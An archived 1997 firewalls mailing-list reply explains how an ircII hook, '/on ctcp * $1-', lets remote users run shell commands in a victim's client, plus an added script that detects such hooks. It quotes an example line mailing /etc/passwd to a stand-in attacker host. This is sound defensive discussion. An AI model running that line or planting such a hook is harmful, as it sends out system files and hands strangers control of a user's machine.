Great Circle Associates Firewalls
(February 1997)
 


Subject: Re: irc and firewalls
From: Darren Reed <avalon @ coombs . anu . edu . au>
Date: Wed, 26 Feb 1997 19:15:24 +1100 (EDT)
To: gordy @ nytimes . com (Gordy Thompson)
Cc: firewalls @ GreatCircle . COM
In-reply-to: <3 . 0 . 16 . 19970225162012 . 29977536 @ mailgate . nytimes . com> from "Gordy Thompson" at Feb 25, 97 04:14:22 pm

In some mail from Gordy Thompson, sie said:
[...]
> plug-gw: port 6677 your.subnets.*.* -plug-to some_irc_server -port 6677
> 
>         The DCC insecurities (if I understand correctly that inbound DCC
> initiates connections on _random_ ports) are already dealt with if you're
> already controlling connection attempts to your other firewall ports.
> 
>         What am I missing here?

The real problem: your users.  IRC, with its messaging and clients that can
execute unix commands, can very easily be turned into a "remote login"
session.  If you thought "+" or "+ +" in .rhosts files was obscure in
meaning then try on "/on ctcp * $1-" (or whatever it is).  I'm not sure if
this is limited to the ircII client on unix, but when a user types in the
above correctly, a remote user can send messages to the victim and the
victim's client (silently) recognises them as commands, just as if the
victim had typed it in.  Those commands can be ones which execute shell
stuff, such as "mail foo@badguy.com</etc/passwd".  It can be especially
deceiving for first timers/"newbies" even if trained to look out for
password requests and receiving files from others, because none of this is
required.  Filtering out DCC makes no difference to this.

The real problem isn't IRC itself, or insecure software, it is the
obfuscating of security hazards.

Darren
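
An added example, not part of the original message: a small audit script that flags ircII-style `on` hooks whose action starts with text taken from the incoming message, which is the pattern Darren describes. The hook syntax handled here and the names `scan_rc`, `ON_HOOK` and `SAMPLE` are assumptions made for illustration; the sample file contents are constructed.

```python
import re

# Assumed ircII hook shape: [/]on [modifiers]EVENT [-|^]PATTERN ACTION
ON_HOOK = re.compile(
    r'^\s*/?on\s+[#^+-]*(?P<event>\w+)\s+[-^]?(?P<pattern>"[^"]*"|\S+)\s+(?P<action>.+)$',
    re.IGNORECASE,
)
# The action's first token is an expando ($*, $0, $1-, ...), so whatever
# the remote side sent is run as the command itself, not passed as an argument.
REMOTE_FIRST = re.compile(r'^[{\s/^]*\$(\*|\d+-?)')

def scan_rc(text):
    """Return (line_number, event, line) for each hook that executes remote text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hook = ON_HOOK.match(line)
        if hook and REMOTE_FIRST.match(hook.group("action")):
            findings.append((lineno, hook.group("event").lower(), line.strip()))
    return findings

# Constructed sample startup file: two risky hooks, one harmless display hook.
SAMPLE = '''# constructed sample startup file
set novice off
on ^msg * echo *$0* $1-
/on ctcp * $1-
alias j join $0
ON ^CTCP "*" {$2-}
'''

if __name__ == "__main__":
    for lineno, event, line in scan_rc(SAMPLE):
        print(f"line {lineno}: '{event}' hook runs remote text as a command: {line}")
```

A hook typed interactively never reaches a file, so this covers only startup files and scripts users are given to load.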

